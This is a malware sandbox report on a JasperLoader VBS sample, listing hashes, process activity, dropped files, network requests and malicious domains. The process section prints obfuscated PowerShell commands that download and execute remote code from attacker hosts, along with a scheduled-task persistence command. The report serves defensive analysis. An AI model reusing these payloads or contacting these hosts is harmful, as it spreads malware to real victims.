analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

IT155060755342376521807896714438.vbs

Full analysis: https://app.any.run/tasks/a47d2649-c367-490e-9931-fc8ad21d5664
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 15, 2019, 12:53:40
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
jasper
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF, LF line terminators
MD5:

89A2AB4ED137E19C9373CBB2BA51A180

SHA1:

456C72AD3DB070A23B70B20E863A2A6BD7C77268

SHA256:

F79E87797EF023405A01230CAD3676481EE60DDE4EE56E07A687EE4634DC612B

SSDEEP:

48:+B7nlQ1pT/oMZQUWc7uisx0IzQvWs6WhwbKsRVXrHZFMZQUWvNbQL2SAK7AfWBSr:UQUbx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Task Scheduler to run other applications

      • powershell.exe (PID: 620)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3048)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 488)
      • powershell.exe (PID: 620)
    • Executes application which crashes

      • powershell.exe (PID: 488)
    • Executes PowerShell scripts

      • WScript.exe (PID: 1212)
      • WScript.exe (PID: 1464)
    • Executes scripts

      • powershell.exe (PID: 488)
  • INFO

    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 620)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
6
Malicious processes
1
Suspicious processes
3

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe wscript.exe no specs ntvdm.exe no specs powershell.exe schtasks.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1212"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\IT155060755342376521807896714438.vbs"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
488"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command $scau='';105,102,40,40,40,71,101,116,45,85,73,67,117,108,116,117,114,101,41,46,78,97,109,101,32,45,109,97,116,99,104,32,34,82,85,124,85,65,124,66,89,124,67,78,34,41,32,45,111,114,32,40,40,71,101,116,45,87,109,105,79,98,106,101,99,116,32,45,99,108,97,115,115,32,87,105,110,51,50,95,67,111,109,112,117,116,101,114,83,121,115,116,101,109,32,45,80,114,111,112,101,114,116,121,32,77,111,100,101,108,41,46,77,111,100,101,108,32,45,109,97,116,99,104,32,34,86,105,114,116,117,97,108,66,111,120,124,86,77,119,97,114,101,124,75,86,77,34,41,41,123,101,120,105,116,59,125,59,36,99,106,115,100,61,32,74,111,105,110,45,80,97,116,104,32,36,101,110,118,58,116,101,109,112,32,34,87,105,110,48,49,99,101,46,106,115,34,59,36,103,100,115,101,61,32,74,111,105,110,45,80,97,116,104,32,36,69,78,86,58,85,115,101,114,80,114,111,102,105,108,101,32,34,67,114,121,112,115,114,118,46,101,120,101,34,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,83,116,114,105,110,103,40,34,104,116,116,112,58,47,47,101,109,101,46,101,109,101,114,97,108,100,115,117,114,102,118,105,115,105,111,110,46,99,111,109,47,118,50,105,46,112,104,112,63,110,101,101,100,61,106,115,38,118,105,100,61,112,101,99,49,49,118,98,115,38,97,106,122,104,101,34,41,124,111,117,116,45,102,105,108,101,32,36,99,106,115,100,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,99,106,115,100,59,125,99,97,116,99,104,123,125,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,34,104,116,116,112,58,47,47,102,97,100,46,99,50,49,97,98,101,108,46,105,110,102,111,47,97,112,105,63,98,99,102,115,98,34,44,36,103,100,115,101,41,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,103,100,115,101,59,125,99,97,116,99,104,123,125,59|%{$tswa=[char]$_;$scau+=$tswa};iex $scau;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1464"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Win01ce.js" C:\Windows\System32\WScript.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
1140"C:\Windows\system32\ntvdm.exe" -i1 C:\Windows\system32\ntvdm.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
NTVDM.EXE
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
620"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $bgfvsa='';function wwggdus($uzbucb){return [Char]([int](16929 - 3620 - 6212 - 7083 + $uzbucb));};91,88,26,18,26,57,87,102,31,71,59,53,103,94,102,103,100,87,27,32,64,83,95,87,18,31,95,83,102,85,90,18,25,53,64,110,68,65,110,68,71,110,71,51,110,52,75,25,18,31,97,100,18,26,57,87,102,31,73,95,91,65,84,92,87,85,102,18,31,85,94,83,101,101,18,73,91,96,37,36,81,53,97,95,98,103,102,87,100,69,107,101,102,87,95,18,31,66,100,97,98,87,100,102,107,18,63,97,86,87,94,27,32,63,97,86,87,94,18,31,95,83,102,85,90,18,25,72,91,100,102,103,83,94,52,97,106,110,72,63,105,83,100,87,110,61,72,63,25,18,27,109,18,87,106,91,102,45,18,111,-4,22,84,89,81,57,97,97,86,66,51,102,90,18,47,18,22,88,83,94,101,87,45,-4,26,60,97,91,96,31,66,83,102,90,18,22,55,64,72,44,71,101,87,100,66,100,97,88,91,94,87,18,25,78,51,98,98,54,83,102,83,78,68,97,83,95,91,96,89,78,63,91,85,100,97,101,97,88,102,25,27,30,18,22,55,64,72,44,71,101,87,100,66,100,97,88,91,94,87,30,18,26,60,97,91,96,31,66,83,102,90,18,18,22,87,96,104,44,66,71,52,62,59,53,18,20,78,62,91,84,100,83,100,91,87,101,20,27,30,18,77,55,96,104,91,100,97,96,95,87,96,102,79,44,44,57,87,102,56,97,94,86,87,100,66,83,102,90,26,25,51,98,98,94,91,85,83,102,91,97,96,54,83,102,83,25,27,30,18,22,55,64,72,44,102,87,95,98,18,110,18,23,109,-4,18,18,91,88,26,18,70,87,101,102,31,66,83,102,90,18,26,18,60,97,91,96,31,66,83,102,90,18,22,81,18,20,63,91,85,100,97,101,97,88,102,55,86,99,87,32,91,96,91,20,18,27,18,27,109,-4,18,18,18,18,22,84,89,81,57,97,97,86,66,51,102,90,18,47,18,22,81,45,-4,18,18,111,-4,18,18,91,88,26,18,19,22,84,89,81,57,97,97,86,66,51,102,90,18,27,109,-4,18,18,18,18,22,86,89,83,90,83,103,18,47,18,60,97,91,96,31,66,83,102,90,18,22,81,18,20,101,88,87,102,103,106,20,45,-4,18,18,18,18,102,100,107,109,-4,18,18,18,18,18,18,101,85,18,31,66,83,102,90,18,22,86,89,83,90,83,103,18,31,72,83,94,103,87,18,22,98,91,86,45,-4,18,18,18,18,18,18,100,91,18,31,66,83,102,90,18,22,86,89,83,90,83,103,45,18,-4,18,18,18,18,18,18,22,84,89,81,57,97,97,86,66,51,102,90,18,47,18,22,81,45,-4,18,18,18,18,111,85,83,102,85,90,109,-4,18,18,18,18,18,18,22,84,89,81,57,97,97,86,66,51,102,90,18,47,18,22,88,83,94,101,87,45,-4,18,18,18,18,111,-4,18,18,111,-4,111,-4,91,88,26,18,22,84,89,81,57,97,97,86,66,51,102,90,18,27,109,-4,18,18,22,83,91,87,107,87,18,18,47,18,25,25,45,-4,18,18,22,106,86,102,108,88,87,105,18,47,18,22,84,89,81,57,97,97,86,66,51,102,90,18,29,18,20,78,86,97,85,103,95,87,96,102,101,20,45,-4,18,18,22,89,91,103,108,107,108,102,18,18,18,18,47,18,22,84,89,81,57,97,97,86,66,51,102,90,18,29,18,20,78,73,91,96,86,97,105,101,59,96,86,87,106,91,96,89,69,87,100,104,91,85,87,32,92,101,20,45,-4,18,18,22,90,92,87,84,84,85,107,18,47,18,64,87,105,31,65,84,92,87,85,102,18,69,107,101,102,87,95,32,64,87,102,32,73,87,84,53,94,91,87,96,102,45,-4,18,18,22,90,92,87,84,84,85,107,32,53,100,87,86,87,96,102,91,83,94,101,18,47,18,77,69,107,101,102,87,95,32,64,87,102,32,53,100,87,86,87,96,102,91,83,94,53,83,85,90,87,79,44,44,54,87,88,83,103,94,102,53,100,87,86,87,96,102,91,83,94,101,45,-4,18,18,91,88,18,26,31,96,97,102,18,26,70,87,101,102,31,66,83,102,90,18,22,89,91,103,108,107,108,102,18,18,27,18,27,109,18,18,22,90,92,87,84,84,85,107,32,54,97,105,96,94,97,83,86,69,102,100,91,96,89,26,25,90,102,102,98,44,33,33,108,108,91,32,84,87,94,94,87,104,91,94,94,87,86,85,32,85,97,95,33,104,36,91,32,98,90,98,49,96,87,87,86,47,92,101,24,25,27,18,110,18,97,103,102,31,88,91,94,87,18,22,89,91,103,108,107,108,102,18,45,18,111,-4,18,18,91,88,18,26,31,96,97,102,18,26,70,87,101,102,31,66,83,102,90,18,22,106,86,102,108,88,87,105,27,18,27,109,18,22,90,92,87,84,84,85,107,32,54,97,105,96,94,97,83,86,69,102,100,91,96,89,26,25,90,102,102,98,44,33,33,108,108,91,32,84,87,94,94,87,104,91,94,94,87,86,85,32,85,97,95,33,104,36,91,32,98,90,98,49,96,87,87,86,47,84,97,86,107,24,25,27,18,110,18,97,103,102,31,88,91,94,87,18,22,106,86,102,108,88,87,105,45,18,18,111,-4,18,18,102,100,107,109,-4,18,18,18,18,57,87,102,31,53,97,96,102,87,96,102,18,22,106,86,102,108,88,87,105,110,18,73,90,87,100,87,31,65,84,92,87,85,102,18,109,22,81,18,31,95,83,102,85,90,18,22,100,87,89,87,106,111,18,110,18,56,97,100,55,83,85,90,31,65,84,92,87,85,102,109,18,22,83,91,87,107,87,18,29,47,18,22,81,18,31,100,87,98,94,83,85,87,18,25,32,32,26,32,27,25,30,25,22,35,25,111,45,-4,18,18,18,18,91,87,106,18,22,83,91,87,107,87,45,-4,18,18,111,85,83,102,85,90,109,111,45,-4,111,-4|%{$bgfvsa += wwggdus($_);};iex $bgfvsa;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3048"C:\Windows\system32\schtasks.exe" /create /TN "Windows Indexing Service" /sc DAILY /st 00:00 /f /RI 20 /du 24:59 /TR C:\Users\admin\AppData\Roaming\Microsoft\WindowsIndexingService.jsC:\Windows\system32\schtasks.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
889
Read events
755
Write events
134
Delete events
0

Modification events

(PID) Process:(1212) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(1212) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(488) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(488) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(488) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(488) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(488) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
4294901760
(PID) Process:(488) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(488) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(488) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
Executable files
0
Suspicious files
4
Text files
7
Unknown types
0

Dropped files

PID
Process
Filename
Type
488powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XJSTJXPSEYKFKQYWAQ33.temp
MD5:
SHA256:
1140ntvdm.exeC:\Users\admin\AppData\Local\Temp\scs3C60.tmp
MD5:
SHA256:
1140ntvdm.exeC:\Users\admin\AppData\Local\Temp\scs3C71.tmp
MD5:
SHA256:
620powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5CMZHGWC2VCA3RNY4P0L.temp
MD5:
SHA256:
620powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\sfetux
MD5:
SHA256:
620powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF133d5a.TMPbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
620powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
488powershell.exeC:\Users\admin\Crypsrv.exetext
MD5:002980E7414C1FCFBF9320983A4C4D6B
SHA256:6C7DC20FDC31326AF0691F097AC0CFE26940BF76C63560EF18C8721E68FAA350
488powershell.exeC:\Users\admin\AppData\Local\Temp\Win01ce.jstext
MD5:69EF89885C896016455E998995427521
SHA256:6942A7C8311870489E80B053B3FBB58DEED99AB9F00009B6685AD2B20CF9B7EE
620powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\MicrosoftEdqe.cachetext
MD5:418A1BD9526082A9F292CEC75EC01F18
SHA256:4F82EE9A6A5A16270457BEF6C6C547C751683F4D5FEBAC2D628E883449CEE1B1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
3
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
488
powershell.exe
GET
200
185.158.249.122:80
http://eme.emeraldsurfvision.com/v2i.php?need=js&vid=pec11vbs&ajzhe
NL
text
17.0 Kb
malicious
620
powershell.exe
GET
200
176.10.118.245:80
http://zzi.bellevilledc.com/v2i.php?need=js&
CH
text
16.9 Kb
malicious
488
powershell.exe
GET
200
185.212.47.163:80
http://fad.c21abel.info/api?bcfsb
DE
text
10 b
suspicious
620
powershell.exe
GET
200
176.10.118.245:80
http://zzi.bellevilledc.com/v2i.php?need=body&
CH
text
11.7 Kb
malicious
620
powershell.exe
GET
200
176.10.118.245:80
http://zzi.bellevilledc.com/v2i.php?guid=USER-PC_2ea6daede3b54a598aa9&v=512.2&lg%5Burl%5D=http://zzi.bellevilledc.com/v2i.php
CH
text
21 b
malicious
620
powershell.exe
GET
200
176.10.118.245:80
http://zzi.bellevilledc.com/v2i.php?guid=USER-PC_2ea6daede3b54a598aa9&v=512.2&cache=&psver=2&ssid=4939b5d084e14f31&os=6.1.7601.17514
CH
text
1.03 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
488
powershell.exe
185.158.249.122:80
eme.emeraldsurfvision.com
easystores GmbH
NL
malicious
620
powershell.exe
176.10.118.245:80
zzi.bellevilledc.com
SOFTplus Entwicklungen GmbH
CH
malicious
185.212.47.163:80
fad.c21abel.info
23media GmbH
DE
unknown

DNS requests

Domain
IP
Reputation
eme.emeraldsurfvision.com
  • 185.158.249.122
malicious
fad.c21abel.info
  • 185.212.47.163
suspicious
zzi.bellevilledc.com
  • 176.10.118.245
malicious

Threats

PID
Process
Class
Message
620
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan-Downloader.Script.Generic (JasperLoader)
No debug info